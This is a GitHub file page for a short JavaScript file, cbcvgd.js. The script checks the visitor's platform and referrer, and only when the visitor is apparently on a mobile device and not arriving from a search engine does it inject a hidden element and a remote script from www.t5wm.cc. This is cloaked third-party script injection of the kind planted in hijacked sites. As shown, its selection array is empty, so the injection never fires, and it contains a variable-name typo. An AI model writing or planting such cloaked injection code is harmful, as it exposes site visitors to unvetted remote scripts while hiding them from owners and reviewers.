-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcbcvgd.js
41 lines (36 loc) · 1.49 KB
/
cbcvgd.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// 2022年11月27日
var system = {
win: false,
mac: false,
xll: false
};
var p = navigator.platform;
var us = navigator.userAgent.toLowerCase();
system.win = p.indexOf("Win") == 0;
system.mac = p.indexOf("Mac") == 0;
system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
var regexp = /\.(sogou|soso|baidu|google|youdao|yahoo|bing|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (!system.win && !system.mac && !system.xll && !regexp.test(where)) {
const temporaryGroups = [];
const randomNums = (arr) => arr[Math.floor(Math.random() * arr.length)];
const randomElements = randomNums(temporaryGroups);
if (randomElements == 'sm') {
}
if (randomElements == 't5cpa') {
(function (){
var id = "9142199889545937380-62115";
document.write('<ins style="display:none!important" id="' + id + '"></ins>');
(window.adbyunion = window.adbyunion || []).push(id);
document.write('<script async src="https://www.t5wm.cc/o.js"></script>');
})();
}
if (randomElements == 't5cpc') {
(function (){
var id = "9142199889545937380-62114";
document.write('<ins style="display:none!important" id="' + id + '"></ins>');
(window.adbyunion = window.adbyunion || []).push(id);
document.write('<script async src="https://www.t5wm.cc/o.js"></script>');
})();
}
}